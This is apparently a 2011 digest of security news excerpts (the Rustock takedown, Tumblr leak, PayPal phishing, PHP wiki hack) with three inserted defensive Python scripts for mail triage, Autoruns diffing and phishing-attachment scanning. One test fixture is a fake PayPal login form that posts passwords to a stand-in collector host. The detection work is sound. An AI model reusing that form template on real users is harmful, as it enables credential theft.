Homegrown: Rustock Botnet Fed by U.S. Firms
Aaron Wendel opened the doors of his business to some unexpected visitors on the morning of Mar. 16, 2011. The chief technology officer of Kansas City-based hosting provider Wholesale Internet found that two U.S. marshals, a pair of computer forensics experts and a Microsoft lawyer had come calling, armed with papers allowing them to enter the facility and to commandeer computer hard drives and portions of the hosting firm's network. Anyone attempting to interfere would be subject to arrest and prosecution.
Weeks earlier, Microsoft had convinced a federal judge (PDF) to let the software giant seize control of server hard drives and reroute Internet addresses as part of a carefully timed takedown of the Rustock botnet, which had long reigned as the world's most active spam-spewing crime machine.
In tandem with the visit to Wholesale Internet, Microsoft employees and U.S. marshals were serving similar orders at several other hosting providers at locations around the country. Microsoft's plan of attack - which it spent about six months hatching with the help of a tightly knit group of industry and academic partners - was to stun the Rustock botnet by disconnecting more than 100 control servers that the botnet was using to communicate with hundreds of thousands of infected Windows PCs.
Continued : https://krebsonsecurity.com/2011/03/homegrown-rustock-botnet-fed-by-u-s-firms/
Adobe releases Flash 10.2 for Android, patches vulnerabilities
Adobe has released version 10.2 of its Flash Player for Android. The latest update brings support for devices with multi-core processors, such as the dual-core Motorola Atrix, and includes several performance enhancements for viewing video and interactive content.
Deeper integration with the Android browser rendering engine and support for hardware accelerated video rendering for H.264 have been added for devices running version 3.0 of Android "Honeycomb" - the developers note that the release is "initially a beta" for Android 3.0 and that the 3.0.1 system update is required. This Android version of Flash also addresses a number of security vulnerabilities which were fixed in version 10.2.152.26 of its desktop counterpart last month.
Continued : http://www.h-online.com/security/news/item/Adobe-releases-Flash-10-2-for-Android-patches-vulnerabilities-1211560.html
Outdated Computer Definition Renders WiFi Hacking Legal in the Netherlands
The definition of computers as specified in Dutch computer intrusion legislation has led to the acquittal of a defendant charged with breaking into a protected WiFi network.
The controversial verdict [Google translation] was handed down earlier this month by a Hague court in the case of a Maerlant College graduate who announced his intention to shoot people at his former school online.
The announcement was posted, allegedly as a joke, on the notorious website 4chan.org, a regular source for pranks and questionable Internet humor.
However, because it came two days after a school shooting in Germany, the threat was taken very seriously by some members of the image board who notified the college.
In addition to the criminal offense related to the threat itself, the student was also charged with computer intrusion because he made the announcement from a wireless network he hacked into.
The judge ordered the defendant to 120 hours of community service for making threats against human life, but acquitted him on the computer intrusion charges.
Continued : http://news.softpedia.com/news/Outdated-Computer-Definition-Renders-WiFi-Hacking-Legal-in-the-Netherlands-190551.shtml
Tumblr blames 'human error' for weekend security lapse
Tumblr has downplayed the severity of a security breach that may have exposed users' personal information including passwords and server IP addresses.
Popular blogging service Tumblr has cited "human error" as the cause behind a security glitch that may have revealed users' passwords, API keys, IP addresses and other personal data.
The alarm was sounded Saturday morning via Twitter. "OMG! The Tumbeasts are spitting out passwords!" the tweet read. The news quickly spread, with armchair hackers taking to forums to debate the extent and cause of the glitch. As it turns out, a PHP coding error was likely to blame for 748 lines of information being made visible.
Tumblr responded quickly to fix the problem and followed up with an official statement posted about five hours later. Here's what Tumblr had to say for itself:
Continued : http://www.digitaltrends.com/computing/tumblr-blames-human-error-for-weekend-security-lapse/
ICANN Approves .xxx Top-level Domain
The adult entertainment industry now has a home on the Internet: It's called .xxx.
The group that manages the Internet's top-level domains -- the .com, .org and .net that we all type at the end of e-mail messages and Web addresses -- said Friday that it will establish a .xxx domain, a move that it hopes will add a measure of predictability and security to the wild world of Internet websites. The Internet Corporation for Assigned Names and Numbers (ICANN) signed off on the process at a meeting in San Francisco this week.
Pornography is often used to lure Web surfers to dangerous or fraudulent sites. By regulating .xxx, ICANN hopes to make things better.
Anyone who wants to register a .xxx domain will first have to go through an application process that's approved by the International Foundation for Online Responsibility. This procedure is intended to ensure that .xxx domains don't engage in fraud, child pornography and other practices. At the same time, having a domain set aside specifically for adult websites would make it easier for users to block such sites from their browsing experience.
The move gives consumers "reassurance they are more protected from the risk of viruses, identity theft, credit card fraud and inadvertent exposure to child abuse images," ICANN said Friday in a statement announcing the decision.
Continued : http://www.pcworld.com/businesscenter/article/222609/icann_approves_xxx_toplevel_domain.html
Also: It's official: ICANN approves .xxx
CSIS expert list worst cyber security breaches since Jan '10
"CSIS expert lists worst cyber security breaches since January 2010"
According to Bank Info Security, testimony was given before the House Homeland Security Committee last week by James Lewis, senior fellow at the Center for Strategic and International Studies (CSIS).
Lewis's testimony included a list of serious security incidents that have taken place since January 2010. This list is reproduced below, with thanks to Bank Info Security.
Lewis is reported to have stated that the list "is not a record of success". He added "Whatever we are doing is not working...While individual government agencies have made strenuous efforts to improve our cyberdefenses, as a nation, despite all the talk, we are still not serious about cybersecurity."
This looks really rather damning of today's security infrastructure. But, I can't help but wonder how many cyber attacks weren't successful, thanks to the security that is place today? While I would agree that no one should rest on their laurels when it comes to security, I also know that there is no silver bullet.
I wonder if Lewis will also be providing advice on what needs to be done to help better secure against attacks. No one wants to be a victim, and most companies out there are doing what they can to stave off attacks.
Continued : http://nakedsecurity.sophos.com/2011/03/21/worst-security-breaches-2010/
Yet another malicious Facebook app:"Father crashes and dies"
Over the weekend, a lot of Facebook users started receiving malicious chat messages from their friends that looked like this: [Screenshot]
"Father crashes and dies because of THIS message posted on his daughters profile wall!" - followed by a shortened URL (using the bit.ly URL shortening service). The missing apostrophe in the word "daughter's" - i.e. "daughter's profile wall" - could be a clue that the message is not genuine, or at least that the author is not a native English speaker, but let's take a look at what would happen to a user who falls for this social engineering trick. [Screenshot]
Once clicked, the link takes the innocent user through a chain of redirections which ends up with a malicious Facebook app showing up on the screen and requesting several permissions.
Continued : http://www.securelist.com/en/blog/6115/Yet_another_malicious_Facebook_app_Father_crashes_and_dies
Japan Quake Spam (II)
From the Kaspersky Labs Weblog:
As was predicted by many, email scams soliciting donations for Japan are appearing in users' inboxes. We took a closer look at one of these messages and identified the following details: [Screenshot]
This email was apparently sent from an IP address in Canada via a mail server in Spain. The "From" and "Reply To" fields show a Japanese mail address and are most probably spoofed, while the message body mentions "Sasiki Nakatawo", a very uncommon, if not totally fictitious name, as the recipient of funds sent by Western Union money transfers. Potential victims are then requested to send their data and Money Transfer Control Number to a mail address in Hong Kong. By the way, the character setting of the mailer used to compose the message was set to "Windows-1251" (Cyrillic).
As we can see, there are a number of different locations around the world linked to this scheme. However, Kaspersky Lab's mail filtering products put this kind of stuff where it really belongs - the SPAM folder.
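The Kaspersky post reads the message's Received chain, From/Reply-To headers, body contact address and charset by hand. The script below is an added example (not Kaspersky's code) that automates that header triage: it walks the Received headers from the originating hop outward, compares the From, Reply-To and body contact domains, and flags a Cyrillic charset and a wire-transfer lure. The sample message is constructed for this example; the IP addresses are RFC 5737 documentation addresses and every hostname and mailbox is fictitious.

```python
"""Header triage for a suspected charity-scam e-mail (added example)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: two Received hops (origin -> relay -> our MX), a
# Japanese From/Reply-To pair, a Cyrillic charset and a Hong Kong contact
# address in the body. All names and addresses are fictitious.
SAMPLE = """\
Received: from mx.example.net (mx.example.net [198.51.100.7])
\tby mail.example.org with ESMTP; Mon, 21 Mar 2011 09:00:00 +0000
Received: from [192.0.2.45] (unknown [192.0.2.45])
\tby mx.example.net with SMTP; Mon, 21 Mar 2011 08:59:50 +0000
From: Relief Desk <relief@example.jp>
Reply-To: Relief Desk <relief@example.jp>
Subject: Japan earthquake donation
Content-Type: text/plain; charset="Windows-1251"

Please send your Western Union Money Transfer Control Number
and your details to claims@example.hk.
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
CYRILLIC_CHARSETS = {"windows-1251", "cp1251", "koi8-r", "iso-8859-5"}
LURE_RE = re.compile(r"western union|money transfer control number|\bMTCN\b", re.I)


def relay_chain(msg):
    """IPs from the Received headers, earliest hop first.

    Each relay prepends its own Received header, so the last header in
    the message is the hop closest to the sender.
    """
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = IP_RE.search(hdr)
        if m:
            hops.append(m.group(1))
    return hops


def domain_of(addr):
    return addr.rpartition("@")[2].lower()


def triage(raw):
    """Return the extracted details plus a list of indicator flags."""
    msg = message_from_string(raw)
    from_addr = parseaddr(msg.get("From", ""))[1]
    reply_addr = parseaddr(msg.get("Reply-To", from_addr))[1]
    charset = (msg.get_content_charset() or "us-ascii").lower()
    body = msg.get_payload(decode=True).decode(charset, "replace")
    body_addrs = sorted({a.lower() for a in EMAIL_RE.findall(body)})

    flags = []
    if domain_of(reply_addr) != domain_of(from_addr):
        flags.append("reply_to_domain_mismatch")
    if any(domain_of(a) != domain_of(from_addr) for a in body_addrs):
        # Replies are steered to a mailbox unrelated to the claimed sender.
        flags.append("body_contact_address_elsewhere")
    if charset in CYRILLIC_CHARSETS:
        flags.append("cyrillic_charset")
    if LURE_RE.search(body):
        flags.append("wire_transfer_lure")

    return {
        "relay_chain": relay_chain(msg),
        "from": from_addr,
        "reply_to": reply_addr,
        "body_addresses": body_addrs,
        "charset": charset,
        "flags": flags,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The relay chain is only as trustworthy as the headers the last hop you control added; anything before that can be forged, so geolocating the earliest IP (as the post does) is a lead, not proof.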
So You Got an AV Alert. Now What?
From SANS Internet Storm Center:
What do you do when you receive an antivirus alert on your home system?
You're checking your mail in the morning before heading to work, you click on a link sent to you by a friend and your AV throws up an alert. What do you do next?
Is it time to start from scratch and rebuild the system?
In that particular scenario, probably not. The antivirus was likely successful in thwarting the attempt to compromise your system. You can most likely get away with booting up in safe mode (we're talking about Windows here, not your smartphone), updating signatures and running a full scan. A quick look at autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902) or hijackthis (http://free.antivirus.com/hijackthis/) output would also be a sound step; in fact, you should do that before you have an alert, just to get a baseline.
Then look into how you were exposed and report that appropriately.
When is the Worst Time to Get an Alert?
Having an alert pop up in the middle of your Internet activities is one thing. Yet it's worse to receive alerts right after the signatures have been updated. Now you don't have much information on how long you've been compromised, and the odds that the chain-of-compromise (http://isc.sans.edu/diary.html?storyid=9880) was complete are much larger.
This is when it's time to have a serious discussion with yourself about rebuilding your system.
What Does that Alert Tell You Anyway?
Continued : http://isc.sans.edu/diary.html?storyid=10561
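The diary's advice to take an Autoruns baseline before you ever get an alert only pays off if you can compare it with a later export. The script below is an added example (not from the ISC diary or Sysinternals) of that comparison: it loads two CSV exports, reports entries that were added, removed or repointed to a different image or signer, and singles out the ones that are not signed by a verified publisher. It assumes both exports came from autorunsc in CSV mode and were already decoded to text (recent autorunsc builds write UTF-16), and it uses only a subset of the real column names; both exports below are constructed for the example.

```python
"""Diff a baseline Autoruns CSV export against a current one (added example)."""
import csv
import io

# Constructed baseline export; only the columns this script needs are kept.
BASELINE_CSV = """\
"Entry Location","Entry","Enabled","Description","Signer","Image Path"
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","ExampleUpdater","enabled","Example Corp updater","(Verified) Example Corp","c:\\program files\\example\\updater.exe"
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","PhotoSync","enabled","Photo sync helper","(Verified) Photo Tools Ltd","c:\\users\\alice\\appdata\\local\\phototools\\photosync.exe"
"""

# Constructed export taken after the alert: PhotoSync now points at an
# unsigned binary in Temp, and a new unsigned "svchost" Run key appeared.
CURRENT_CSV = """\
"Entry Location","Entry","Enabled","Description","Signer","Image Path"
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","ExampleUpdater","enabled","Example Corp updater","(Verified) Example Corp","c:\\program files\\example\\updater.exe"
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","PhotoSync","enabled","","(Not verified)","c:\\users\\alice\\appdata\\local\\temp\\photosync.exe"
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","svchost","enabled","","(Not verified)","c:\\users\\alice\\appdata\\local\\temp\\svchost.exe"
"""


def load_autoruns(csv_text):
    """Index rows by (Entry Location, Entry), the stable identity of an entry."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {(row["Entry Location"], row["Entry"]): row for row in reader}


def diff_autoruns(baseline, current):
    """Return entries added, removed, or changed in image path / signer."""
    added, removed, changed = [], [], []
    for key, row in current.items():
        old = baseline.get(key)
        if old is None:
            added.append(row)
        elif (old["Image Path"], old["Signer"]) != (row["Image Path"], row["Signer"]):
            changed.append((old, row))
    for key, row in baseline.items():
        if key not in current:
            removed.append(row)
    return {"added": added, "removed": removed, "changed": changed}


def is_unsigned(row):
    """Autoruns prefixes verified Authenticode signers with '(Verified)'."""
    return not row["Signer"].startswith("(Verified)")


def triage(baseline_csv, current_csv):
    """Diff the two exports and list the new or changed entries that are unsigned."""
    delta = diff_autoruns(load_autoruns(baseline_csv), load_autoruns(current_csv))
    alerts = [row for row in delta["added"] if is_unsigned(row)]
    alerts += [new for _, new in delta["changed"] if is_unsigned(new)]
    return delta, alerts


if __name__ == "__main__":
    delta, alerts = triage(BASELINE_CSV, CURRENT_CSV)
    print(f"added={len(delta['added'])} removed={len(delta['removed'])} "
          f"changed={len(delta['changed'])}")
    for row in alerts:
        print(f"REVIEW: {row['Entry Location']}\\{row['Entry']} -> {row['Image Path']}")
```

Keep the baseline export somewhere the machine itself cannot rewrite (removable media or another host); a baseline stored on the box is only as trustworthy as the box.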
Firefox 4 slips out before official launch
Mozilla has quietly released Firefox 4 in advance of an official announcement.
The popular browser's fourth incarnation is available for download now in Linux, Mac OS X and Windows versions, a few weeks late for its planned February launch.
The downloads, which range from around 12MB for Linux and Windows up to a suspiciously bloated 26MB for the Mac version, are well hidden within the Mozilla Foundation's web site, with the main download page still defaulting to version 3.6.
We've been fiddling with the latest iteration for just a few minutes on our Mac Pro and everything seems pretty stable so far.
There have been some minor tweaks to the GUI with Chrome-like tabs now appearing above the main browser bar, but it's the refinements under the hood which should see web wanderers flocking to Mozilla's open source offering.
Improved HTML5 and CSS support should make those complex pages look even prettier and the addition of WebM support will allow HD video to be viewed in a browser window.
WebSocket support will allow developers to build online games and applications, whilst IndexedDB allows web apps to store data on your home system, allowing products like Gmail to work even if you don't have an Internet connection.
Continued : http://www.thinq.co.uk/2011/3/21/firefox-4-slips-out-official-launch/
Related : Mozilla issues second Firefox 4 release candidate
Google blames China for Gmail service disruptions
It seems that the active exploitation of the MHTML vulnerability that Google's Security Team reported on earlier this month has a lot to do with recent attempts by the Chinese government to stem its own online revolution movement without appearing to be doing so.
At the time, the developers didn't point the finger towards the Chinese government but simply said that the attacks against their clients appear to be politically motivated. But Google has now decided to speak up and clear the air regarding the recent difficulties that Chinese customers and advertisers have been having with the Gmail service.
"Relating to Google there is no issue on our side. We have checked extensively. This is a government blockage carefully designed to look like the problem is with Gmail," stated Google. China, as usual, did not comment on the accusations.
Continued : http://www.net-security.org/secworld.php?id=10768
PHP developer wiki server hacked
According to the development team, access details for a number of accounts were stolen during a hack of the PHP developer wiki server wiki.php.net. Initial investigations have found that no other servers were compromised, but there was concern that the PHP source code might have been modified, as the stolen access data also provides access to the PHP repository.
The developers report that they therefore carried out a detailed code audit and checked every code commit in the subversion repository since version 5.3.5. According to a brief statement on www.php.net, no indication that changes had been made has been detected. The hack exploited a vulnerability in the CMS (DokuWiki), and unknown perpetrators were then able to escalate their privileges by use of a Linux root exploit.
The affected system has been wiped and all developers with access to the repository will be required to change their passwords. wiki.php.net was not accessible last Friday, and French security services provider Vupen spread rumours on Twitter that PHP could contain a backdoor. In a tweet which has since been deleted, Vupen linked to the website of a Chinese hacker who claimed to have modified code in the PHP repository. Rather than having inserted a backdoor, however, the intruder merely added the name 'Wolegequ Gelivable' to the credits in one file.
Continued : http://www.h-online.com/security/news/item/PHP-developer-wiki-server-hacked-1211874.html
A Stark Message to Cybercriminals: You Are Not Invisible, You Are Not Beyond the Law
From TrendLabs Malware Blog:
Around the world, every day, security researchers study the activities, behaviors, forum communications, and networks of cybercriminals in an effort to make the world safe for the exchange of digital information.
In addition to preventing attacks, we gather and share intelligence with the appropriate industry anti-cybercrime groups and law enforcement authorities.
We've been tracking one particular criminal, whom we'll call Mr. L, for some time now. He's been preying on innocent users, primarily from Chile and Mexico, and according to our latest findings, he is still up to his old tricks of data and monetary theft. Just last week, we discovered an active command-and-control (C&C) server plus other criminal tools, including one based on a customized version of the CrimePack Exploit Pack, a practice that this criminal has carried out with his previous botnets.
We've already shared our findings with our law enforcement contacts but wanted you to also be aware, on your toes, and on the lookout for suspect email messages and other events.
So what do we know so far?
In September 2010, we published an in-depth research paper (pdf) that discussed the technical aspects of this particular criminal's botnets and toolkits.
The first botnet Trend Micro identified was the Tequila botnet. Then came the Mariachi botnet and the Alebrije and Mehika Twitter botnets. These botnets are collectively known as the Botnet PHP family.
Continued : http://blog.trendmicro.com/a-stark-message-to-cybercriminals-you-are-not-invisible-you-are-not-beyond-the-law/
An interesting article.
Thanks for that Carol.
It seems these cybercriminals are not as anonymous as they might have hoped.
Roundhouse Kick Time
From the F-Secure Weblog:
Chuck Norris kicks ass. We all know that. Malware authors know this too.
In fact, we've seen multiple worms and trojans over the years that make references to Chuck Norris. Probably the best example is the Chuck Norris Router Worm from last year.
While browsing through incoming malware, we noticed this little fellow (md5 66b06adc178d17a7b42301e845eed84d). A botnet client, capable of taking over the computer and allowing full remote access to the infected system.
As usual, it requires a server to connect to. Name of the server? chucknorris.zapto.org. The bot also registers itself in registry under hkcu\software\chuck norris. We detect it as Backdoor:W32/Spyrat.D. Here's a description.
We looked at this a bit deeper and it turns out to be generated with a tool called "CyberGate". Here's what the CyberGate control panel looks like. [Screenshot]
BlackBerry Protect now available in Europe
Private users can now protect their BlackBerry smartphones in the same way that corporate users do using the BlackBerry Enterprise Server. The Canadian BlackBerry maker Research in Motion (RIM) is now providing the BlackBerry Protect application to European customers, previously only available to customers in the US. The free service includes client software for the BlackBerry and a web application.
After installing the BlackBerry Protect client, the user needs to register for the service using the BlackBerry ID that they use for BlackBerry App World. The software can then back up contacts, calendar, tasks, notes, bookmarks, and SMS messages. To save on data usage, the user can request that backups only occur if a Wi-Fi connection is available. The application also allows the data to be restored to the original smartphone or to a new BlackBerry device.
A user who has lost a BlackBerry phone can also use the system to track that phone in order to try and retrieve it, with the phone's location being shown on a map in a web application. The phone can also be locked and loaded with a message for anybody who might find it, and be made to attract attention by ringing loudly for a whole minute, even if it is set to mute. If all this fails to retrieve the device, all its data can then be deleted remotely.
Paypal gets hit with a sophisticated phishing attack
"Able to bypass browser security"
ONLINE PAYMENT SERVICE Paypal has been the victim of a sophisticated phishing attack, according to the US Computer Emergency Readiness Team (US-CERT).
The attack, which is also being used to target Bank of America, Lloyds and TSB, is sent as part of an HTML attachment with unsolicited emails claiming to be legitimate.
The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL, which can be caught by anti-phishing measures built into many popular web browsers. Storing the website locally allows the attack to completely bypass browsers' anti-phishing defences.
US-CERT recommends that users be extra cautious online, particularly with personal information. It suggests that users should not open links and attachments in unsolicited emails, and should also attempt to verify that the email is legitimate by contacting the organisation in question or logging in directly through official websites only.
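Because the phishing page in this campaign arrives as an HTML attachment and is rendered from disk, URL-based browser blocklists never see it, so the attachment itself is the place to look. The script below is an added example (not from US-CERT or the article) of a mail-gateway style check: it parses an HTML attachment, reports any form that collects a password and where that form posts to, and notes which of the brands named in the article appear in the page text. A login form inside an e-mail attachment has no legitimate reason to exist, so one such form is enough to quarantine the message. The attachment is constructed for this example and the collector hostname is fictitious.

```python
"""Flag credential-harvesting forms in an HTML e-mail attachment (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed attachment: a brand-themed page whose form posts the password
# straight to a fictitious collector host.
SAMPLE_ATTACHMENT = """\
<html><head><title>PayPal - Confirm your account</title></head>
<body>
<h2>PayPal account verification</h2>
<form method="post" action="https://collector.example/submit.php">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="hidden" name="campaign" value="pp-2011">
  <input type="submit" value="Log In">
</form>
</body></html>
"""

# Brands named in the article; lowercase because the page text is lowercased.
BRAND_WORDS = ("paypal", "bank of america", "lloyds", "tsb")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and input fields, plus page text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.text = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                ((a.get("type") or "text").lower(), a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def handle_data(self, data):
        self.text.append(data)

    def close(self):
        super().close()
        if self._current is not None:  # tolerate an unclosed <form>
            self.forms.append(self._current)
            self._current = None


def scan_attachment(html):
    """Return credential forms, brand mentions and an overall verdict."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.text).lower()

    credential_forms = []
    for form in parser.forms:
        types = [t for t, _ in form["fields"]]
        if "password" not in types:
            continue
        host = urlsplit(form["action"]).hostname or ""
        credential_forms.append({
            "action": form["action"],
            "host": host,                 # empty when the form posts relative
            "fields": [n for _, n in form["fields"] if n],
            "remote_post": bool(host),
        })

    return {
        "credential_forms": credential_forms,
        "brands_mentioned": [b for b in BRAND_WORDS if b in text],
        "suspicious": bool(credential_forms),
    }


if __name__ == "__main__":
    result = scan_attachment(SAMPLE_ATTACHMENT)
    print(result)
```

The host extracted from the form action is the same indicator an anti-phishing list would want, so a gateway that finds one can feed it back to the browser-side blocklists this technique sidesteps.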
Google cops €100K French spank in Street View slurp
"Google cops €100k French spank in Street View slurp outrage"
French privacy watchdogs have hit Google with its very first fine for allowing its Street View cars to snoop on citizens' Wi-Fi data.
The search giant must pay a €100,000 (£87,114) fine for improperly gathering and storing data for its Street View application.
The privacy regulator CNIL (Commission nationale de l'informatique et des libertés) said it had carried out spot checks to see if Street View was following French law.
The regulator said: "These inspections revealed various violations such as collecting Wi-Fi data without the knowledge of those concerned and the capture of data described as 'content' (IDs, passwords, login details, email exchanges)."
The regulator asked Google to sort things out in May 2010. It was fined for failing to react in a timely manner.
France also accused Google of already using the data collected to improve its geo-location database and "acquire a dominant position in the field..."
Continued : http://www.theregister.co.uk/2011/03/21/google_street_view_fine/
France hands Google record fine over Snoop View
France hits Google with a €100,000 fine over Street View
US man arrested in hacker stock fraud scheme
US authorities Monday arrested and charged a Texas man accused of masterminding a scheme using a Russian hacker and an email spam campaign to pump up the value of fledgling companies, the Justice Department said.
Christopher Rad, 42, of Cedar Park, Texas, was arrested by FBI agents on a federal indictment charging him with one count of conspiracy to commit securities fraud and transmit commercial email messages with fraudulent information.
The scheme employed hackers, including at least one in Russia, to distribute computer viruses to infect computers around the world and create so-called "botnet" computers that were used to manipulate stocks, a Justice Department statement said.
"In addition to relying on unsuspecting investors to buy into the spam promotions, the hackers also hacked into the brokerage accounts of third parties, liquidated the stocks in those accounts, and then used those accounts to purchase shares of the manipulated stocks," the statement said.
"This created trading activity in the manipulated stocks and increased the volume of shares being traded, further creating an impression that the manipulated stocks were worth purchasing."
Continued : http://news.yahoo.com/s/afp/20110321/pl_afp/usitcrimemarkets
Also: Man Charged With Hiring Pump-and-dump Spam Botnet